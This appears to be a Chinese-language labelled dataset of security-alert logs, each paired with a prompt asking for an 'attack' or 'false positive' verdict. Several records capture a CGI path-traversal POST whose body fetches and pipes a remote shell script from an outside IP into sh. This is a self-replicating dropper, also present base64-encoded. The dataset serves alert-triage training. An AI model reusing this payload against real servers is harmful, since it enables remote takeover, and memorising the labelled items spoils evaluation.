"rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nHost: 218.76.15.12:80\r\nAccept: */*\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Custom-AsyncHttpClient\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 103\r\n\r\n", "req_body": "X=$(curl http://45.202.35.190/sh || wget http://45.202.35.190/sh -O-); echo \"$X\" | sh -s apache.selfrep", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567901-发现目录穿越攻击行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "sport": "53352", "h_url": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732686000", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "目录遍历", "_origin": {"write_date": 1732686000, "vuln_harm": "路径穿越攻击可以泄露敏感文件信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.64.208", "site_app": "", "hit_end": 0, "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dport": 80, "vuln_name": "路径穿越攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入,对输入参数过滤../等字符。\r\n3.合理配置web服务器的目录权限,禁止目录遍历。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "xff": "", "sip": "111.67.205.93", "vuln_desc": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "public_date": "2020-11-25 19:44:53", "sport": 53352}, "detail_info": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.12:80/cgi-bin/../../../../../../../../../../bin/sh", "first_access_time": "2024-11-27 13:40:00", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "路径穿越攻击(机器学习)", "alarm_sip": "172.23.64.208", "skyeye_index": "", "sip_ioc_dip": "0c8daac9d6a48e71c53119f7a9d40e10", "xff": "", "vuln_desc": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "attack_chain": "0x02010000", "vuln_harm": "路径穿越攻击可以泄露敏感文件信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732685979", "code_language": "", "public_date": "2020-11-25 19:44:53", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b6b", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "111.67.205.93", "host_md5": "47cbf35b96a43f8ea77926c9a3fa4d22", "user-agent": "Custom-AsyncHttpClient", "vlan_id": "", "vuln_type": "路径穿越攻击(机器学习)", "attack_type": "目录遍历", "is_web_attack": "1", "dip": "172.23.64.208", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入,对输入参数过滤../等字符。\r\n3.合理配置web服务器的目录权限,禁止目录遍历。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlL2Jpbi9zaCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjEyOjgwDQpBY2NlcHQ6ICovKg0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KVXNlci1BZ2VudDogQ3VzdG9tLUFzeW5jSHR0cENsaWVudA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb250ZW50LUxlbmd0aDogMTAzDQoNCg==", "req_body": "WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBhcGFjaGUuc2VsZnJlcA==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.12:80", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_f72632dbd731ff6a9bf9468ea3b7ced4", "access_time": "2024-11-27 13:40:00", "content-length": "103", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "160B0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "text/plain", "sip": "111.67.205.93", "dimension": "3", "url_path": "/cgi-bin/../../../../../../../../../../bin/sh", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nHost: 218.76.15.12:80\r\nAccept: */*\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Custom-AsyncHttpClient\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 103\r\n\r\n", "req_body": "X=$(curl http://45.202.35.190/sh || wget http://45.202.35.190/sh -O-); echo \"$X\" | sh -s apache.selfrep", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569451-路径穿越攻击(机器学习)", "rule_labels": "{}", "sport": "53352", "h_url": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732686000", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732686000, "vuln_harm": "受害主机能被植入后门、远控或木马,导致受害主机已经沦陷,成为傀儡机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.64.208", "site_app": "通用", "hit_end": 11, "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dport": 80, "vuln_name": "通用命令执行漏洞", "rsp_status": 0, "code_language": "通用", "solution": "请尽快排查受害主机上是否存在相关恶意程序并进行查杀,并修复系统漏洞。", "hit_start": 0, "detail_info": "攻击者已经能够执行任意系统命令。", "xff": "", "sip": "111.67.205.93", "vuln_desc": "攻击者已经能够执行任意系统命令。", "public_date": "2019-05-13 18:09:13", "sport": 53352}, "detail_info": "攻击者已经能够执行任意系统命令。", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.12:80/cgi-bin/../../../../../../../../../../bin/sh", "first_access_time": "2024-11-27 13:40:00", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "通用命令执行漏洞", "alarm_sip": "172.23.64.208", "skyeye_index": "", "sip_ioc_dip": "a0320b0e94d077308e449a8da6613291", "xff": "", "vuln_desc": "攻击者已经能够执行任意系统命令。", "attack_chain": "0x02020000", "vuln_harm": "受害主机能被植入后门、远控或木马,导致受害主机已经沦陷,成为傀儡机。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732685979", "code_language": "通用", "public_date": "2019-05-13 18:09:13", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "11", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x100215d7", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "111.67.205.93", "host_md5": "47cbf35b96a43f8ea77926c9a3fa4d22", "user-agent": "Custom-AsyncHttpClient", "vlan_id": "", "vuln_type": "通用命令执行漏洞", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.23.64.208", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请尽快排查受害主机上是否存在相关恶意程序并进行查杀,并修复系统漏洞。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlL2Jpbi9zaCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjEyOjgwDQpBY2NlcHQ6ICovKg0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KVXNlci1BZ2VudDogQ3VzdG9tLUFzeW5jSHR0cENsaWVudA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb250ZW50LUxlbmd0aDogMTAzDQoNCg==", "req_body": "WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBhcGFjaGUuc2VsZnJlcA==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.12:80", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_466f8fb311ce084944e4f58828953568", "access_time": "2024-11-27 13:40:00", "content-length": "103", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "text/plain", "sip": "111.67.205.93", "dimension": "3", "url_path": "/cgi-bin/../../../../../../../../../../bin/sh", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nHost: 218.76.15.12:80\r\nAccept: */*\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Custom-AsyncHttpClient\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 103\r\n\r\n", "req_body": "X=$(curl http://45.202.35.190/sh || wget http://45.202.35.190/sh -O-); echo \"$X\" | sh -s apache.selfrep", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572119-通用命令执行漏洞", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"45.202.35.190\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "sport": "53352", "h_url": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732685030", "vlan_id": "", "vuln_type": "Shell命令执行(机器学习)", "rule_version_str": "3.0.1122.14572", "attack_type": "命令执行", "dip_group": "省公司", "is_web_attack": "1", "nid": "", "dip": "172.23.69.85", "sip_group": "", "repeat_count": "1", "type": "命令执行", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732685030, "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.69.85", "site_app": "", "hit_end": 0, "uri": "/bin/bash", "dport": 473, "vuln_name": "Shell命令执行(机器学习)", "rsp_status": 200, "code_language": "", "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "xff": "", "sip": "183.215.183.134", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "public_date": "2020-11-25 19:51:41", "sport": 59440}, "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9iaW4vYmFzaCBIVFRQLzEuMQ0KSG9zdDogY2FyYm9uLmhlZGkubmV0LmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOTAuMC40NDMwLjIxMiBTYWZhcmkvNTM3LjM2DQoNCg==", "req_body": "", "rsp_header": "SFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBXZWQsIDI3IE5vdiAyMDI0IDA1OjIzOjQ5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAyNDQ4DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpWYXJ5OiBBY2NlcHQtRW5jb2RpbmcNCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMjQgU2VwIDIwMjQgMDM6NTg6MDMgR01UDQpFVGFnOiAiNjZmMjM4Y2ItOTkwIg0KQWNjZXB0LVJhbmdlczogYnl0ZXMNClNldC1Db29raWU6IFNFUlZFUklEPTc3ZDU1ZGExMmE4NWZmOWQ2MjZmNTlmOGMxMmVlMmMyfDE3MzI2ODUwMjl8MTczMjY4NTAyOTtQYXRoPS8NCg0K", "rsp_body": "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9IiI+CiAgPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCIgLz4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSIgLz4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsaW5pdGlhbC1zY2FsZT0xLjAiIC8+CiAgICA8dGl0bGU+56Kz6LWE5Lqn566h55CG5bmz5Y+wPC90aXRsZT4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iL2Fzc2V0cy9jb21wYW55LWljb24uOTRiYTljZTMuc3ZnIiAvPgogICAgPHNjcmlwdCB0eXBlPSJtb2R1bGUiIGNyb3Nzb3JpZ2luIHNyYz0iL2Fzc2V0cy9pbmRleC4zZTJkZGQwNS5qcyI+PC9zY3JpcHQ+CiAgICA8bGluayByZWw9Im1vZHVsZXByZWxvYWQiIGNyb3Nzb3JpZ2luIGhyZWY9Ii9hc3NldHMvdmVuZG9yX2F4aW9zLmIwOWViZWJkLmpzIj4KICAgIDxsaW5rIHJlbD0ibW9kdWxlcHJlbG9hZCIgY3Jvc3NvcmlnaW4gaHJlZj0iL2Fzc2V0cy92ZW5kb3JfdnVlLmZkMWQzZTE5LmpzIj4KICAgIDxsaW5rIHJlbD0ibW9kdWxlcHJlbG9hZCIgY3Jvc3NvcmlnaW4gaHJlZj0iL2Fzc2V0cy92ZW5kb3JfdnVleC4yMjNjMTgxNi5qcyI+CiAgICA8bGluayByZWw9Im1vZHVsZXByZWxvYWQiIGNyb3Nzb3JpZ2luIGhyZWY9Ii9hc3NldHMvdmVuZG9yX21vbWVudC5kMDk1MmI3My5qcyI+CiAgICA8bGluayByZWw9Im1vZHVsZXByZWxvYWQiIGNyb3Nzb3JpZ2luIGhyZWY9Ii9hc3NldHMvdmVuZG9yX2pzZW5jcnlwdC4wMjlhYjkzNS5qcyI+CiAgICA8bGluayByZWw9Im1vZHVsZXByZWxvYWQiIGNyb3Nzb3JpZ2luIGhyZWY9Ii9hc3NldHMvdmVuZG9yX2RheWpzLjlkMzMyYjZjLmpzIj4KICAgIDxsaW5rIHJlbD0ibW9kdWxlcHJlbG9hZCIgY3Jvc3NvcmlnaW4gaHJlZj0iL2Fzc2V0cy92ZW5kb3JfbG9kYXNoLmM5YWMxYWQ2LmpzIj4KICAgIDxsaW5rIHJlbD0ibW9kdWxlcHJlbG9hZCIgY3Jvc3NvcmlnaW4gaHJlZj0iL2Fzc2V0cy92ZW5kb3JfcWlhbmt1bi4zYTBkZjgzYi5qcyI+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Ii9hc3NldHMvaW5kZXguYTg3YWU3ZDYuY3NzIj4KICA8L2hlYWQ+CiAgPHNjcmlwdD4KICAgIC8vIOmXqOaIt+e9keermemmlumhtXJlbeiHqumAguW6lAogICAgKGZ1bmN0aW9uIChkb2MsIHdpbikgewogICAgICBsZXQgcm9vdCA9IGRvYy5kb2N1bWVudEVsZW1lbnQsCiAgICAgICAgcmVzaXplRXZ0ID0gJ29yaWVudGF0aW9uY2hhbmdlJyBpbiB3aW5kb3cgPyAnb3JpZW50YXRpb25jaGFuZ2UnIDogJ3Jlc2l6ZScsCiAgICAgICAgcmVjYWxjID0gZnVuY3Rpb24gKCkgewogICAgICAgICAgLy8gdmFyIGNsaWVudFdpZHRoID0gcm9vdC5jbGllbnRXaWR0aAogICAgICAgICAgLy8gcm9vdC5zdHlsZS5mb250U2l6ZSA9ICcxMDBweCcKICAgICAgICAgIGxldCBjbGllbnRXaWR0aCA9IGRvY3VtZW50LmRvY3VtZW50RWxlbWVudC5jbGllbnRXaWR0aDsKICAgICAgICAgIGxldCBvV2lkdGggPSBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuY2xpZW50V2lkdGggfHwgc2NyZWVuLndpZHRoOwogICAgICAgICAgLy8g6LaF6L+HMTkyMCzlrZfkvZPopoHlj5jlpKcKICAgICAgICAgIGxldCBwd2lkdGggPSAxOTIwOwogICAgICAgICAgLy8gaWYgKGRvY3VtZW50LmRvY3VtZW50RWxlbWVudC5jbGllbnRXaWR0aCA8PSAxOTIwKSB7CiAgICAgICAgICAvLyAgICAgcHdpZHRoID0gZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmNsaWVudFdpZHRoCiAgICAgICAgICAvLyB9CiAgICAgICAgICAvL+avlOS+i+aMiTEwMO+8jOWFvOWuuTM2MOa1j+iniOWZqAogICAgICAgICAgcm9vdC5zdHlsZS5mb250U2l6ZSA9IChvV2lkdGggLyAxOTIwKSAqIDEwMCArICdweCc7CiAgICAgICAgfTsKICAgICAgaWYgKCFkb2MuYWRkRXZlbnRMaXN0ZW5lcikgcmV0dXJuOwogICAgICB3aW4uYWRkRXZlbnRMaXN0ZW5lcihyZXNpemVFdnQsIHJlY2FsYywgZmFsc2UpOwogICAgICBkb2MuYWRkRXZlbnRMaXN0ZW5lcignRE9NQ29udGVudExvYWRlZCcsIHJlY2FsYywgZmFsc2UpOwogICAgfSkoZG9jdW1lbnQsIHdpbmRvdyk7CiAgPC9zY3JpcHQ+CiAgPGJvZHk+CiAgICA8bm9zY3JpcHQ+CiAgICAgIDwhLS0gPHN0cm9uZwogICAgICAgID5XZSdyZSBzb3JyeSBidXQgPCU9IGh0bWxXZWJwYWNrUGx1Z2luLm9wdGlvbnMudGl0bGUgJT4gZG9lc24ndCB3b3JrIHByb3Blcmx5CiAgICAgICAgd2l0aG91dCBKYXZhU2NyaXB0IGVuYWJsZWQuIFBsZWFzZSBlbmFibGUgaXQgdG8gY29udGludWUuPC9zdHJvbmcKICAgICAgPiAtLT4KICAgIDwvbm9zY3JpcHQ+CiAgICA8ZGl2IGlkPSJhcHAiPjwvZGl2PgogICAgCiAgICA8IS0tIGJ1aWx0IGZpbGVzIHdpbGwgYmUgYXV0byBpbmplY3RlZCAtLT4KICA8L2JvZHk+CjwvaHRtbD4K"}, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "file_md5": "", "host": "carbon.hedi.net.cn", "host_state": "企图", "rule_key": "webids", "api": "carbon.hedi.net.cn/bin/bash", "first_access_time": "2024-11-27 13:23:50", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "rsp_body": "<!DOCTYPE html>\n<html lang=\"\">\n <head>\n <meta charset=\"utf-8\" />\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n <meta name=\"viewport\" content=\"width=device-width,initial-scale=1.0\" />\n <title>碳资产管理平台</title>\n <link rel=\"icon\" href=\"/assets/company-icon.94ba9ce3.svg\" />\n <script type=\"module\" crossorigin src=\"/assets/index.3e2ddd05.js\"></script>\n <link rel=\"modulepreload\" crossorigin href=\"/assets/vendor_axios.b09ebebd.js\">\n <link rel=\"modulepreload\" crossorigin href=\"/assets/vendor_vue.fd1d3e19.js\">\n <link rel=\"modulepreload\" crossorigin href=\"/assets/vendor_vuex.223c1816.js\">\n <link rel=\"modulepreload\" crossorigin href=\"/assets/vendor_moment.d0952b73.js\">\n <link rel=\"modulepreload\" crossorigin href=\"/assets/vendor_jsencrypt.029ab935.js\">\n <link rel=\"modulepreload\" crossorigin href=\"/assets/vendor_dayjs.9d332b6c.js\">\n <link rel=\"modulepreload\" crossorigin href=\"/assets/vendor_lodash.c9ac1ad6.js\">\n <link rel=\"modulepreload\" crossorigin href=\"/assets/vendor_qiankun.3a0df83b.js\">\n <link rel=\"stylesheet\" href=\"/assets/index.a87ae7d6.css\">\n </head>\n <script>\n // 门户网站首页rem自适应\n (function (doc, win) {\n let root = doc.documentElement,\n resizeEvt = 'orientationchange' in window ? 'orientationchange' : 'resize',\n recalc = function () {\n // var clientWidth = root.clientWidth\n // root.style.fontSize = '100px'\n let clientWidth = document.documentElement.clientWidth;\n let oWidth = document.documentElement.clientWidth || screen.width;\n // 超过1920,字体要变大\n let pwidth = 1920;\n // if (document.documentElement.clientWidth <= 1920) {\n // pwidth = document.documentElement.clientWidth\n // }\n //比例按100,兼容360浏览器\n root.style.fontSize = (oWidth / 1920) * 100 + 'px';\n };\n if (!doc.addEventListener) return;\n win.addEventListener(resizeEvt, recalc, false);\n doc.addEventListener('DOMContentLoaded', recalc, false);\n })(document, window);\n </script>\n <body>\n <noscript>\n <!-- <strong\n >We're sorry but <%= htmlWebpackPlugin.options.title %> doesn't work properly\n without JavaScript enabled. Please enable it to continue.</strong\n > -->\n </noscript>\n <div id=\"app\"></div>\n \n <!-- built files will be auto injected -->\n </body>\n</html>\n", "h_method": "GET", "sip_addr": "中国--湖南省--长沙市", "x_forwarded_for": "", "device_ip": "172.31.191.7", "alarm_source": "天眼分析平台-8", "vuln_name": "Shell命令执行(机器学习)", "alarm_sip": "172.23.69.85", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "90fe0a02045770706cae53b097ba1510", "proto": "http", "xff": "", "alarm_id": "20241127_6d938b5d55101bab9fec9530524d843d", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "attack_chain": "0x02020000", "access_time": "2024-11-27 13:23:50", "attack_addr": "中国--湖南省--长沙市(28.211238/112.967240)", "type_chain": "16090000", "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "dip_addr": "中国--湖南省--长沙市", "dport": "473", "alert_devip": "172.31.191.8", "rsp_status": "200", "update_time": "1732684970", "code_language": "", "branch_id": "QbJK/fzEi", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "183.215.183.134", "public_date": "2020-11-25 19:51:41", "dimension": "3", "skyeye_serial_num": "QbJK/jYtc", "url_path": "/bin/bash", "src_mac": "00:24:ac:22:84:33", "file_name": "", "confidence": "高", "rsp_header": "HTTP/1.1 200 OK\r\nDate: Wed, 27 Nov 2024 05:23:49 GMT\r\nContent-Type: text/html\r\nContent-Length: 2448\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nLast-Modified: Tue, 24 Sep 2024 03:58:03 GMT\r\nETag: \"66f238cb-990\"\r\nAccept-Ranges: bytes\r\nSet-Cookie: SERVERID=77d55da12a85ff9d626f59f8c12ee2c2|1732685029|1732685029;Path=/\r\n\r\n", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/jYtc", "uri": "/bin/bash", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020b6e", "req_header": "GET /bin/bash HTTP/1.1\r\nHost: carbon.hedi.net.cn\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "183.215.183.134", "rule_state": "green", "asset_group": "省公司", "ioc": "268569454-Shell命令执行(机器学习)", "rule_labels": "{}", "host_md5": "d0c6fc9dc0cc04dc1bada6de2eaef144", "sport": "59440", "h_url": "/bin/bash", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732682584", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "目录遍历", "_origin": {"write_date": 1732682584, "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.243", "site_app": "通用", "hit_end": 253, "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dport": 80, "vuln_name": "发现目录穿越攻击行为", "rsp_status": 0, "code_language": "通用", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": 233, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "xff": "", "sip": "36.138.238.230", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "public_date": "2018-08-16 18:57:22", "sport": 54892}, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.17:80/cgi-bin/../../../../../../../../../../bin/sh", "first_access_time": "2024-11-27 12:43:04", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "POST", "sip_addr": "中国", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现目录穿越攻击行为", "alarm_sip": "172.31.193.243", "skyeye_index": "", "sip_ioc_dip": "6985173378ecefc32af7b59bad83d654", "xff": "", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "attack_chain": "0x02010000", "vuln_harm": 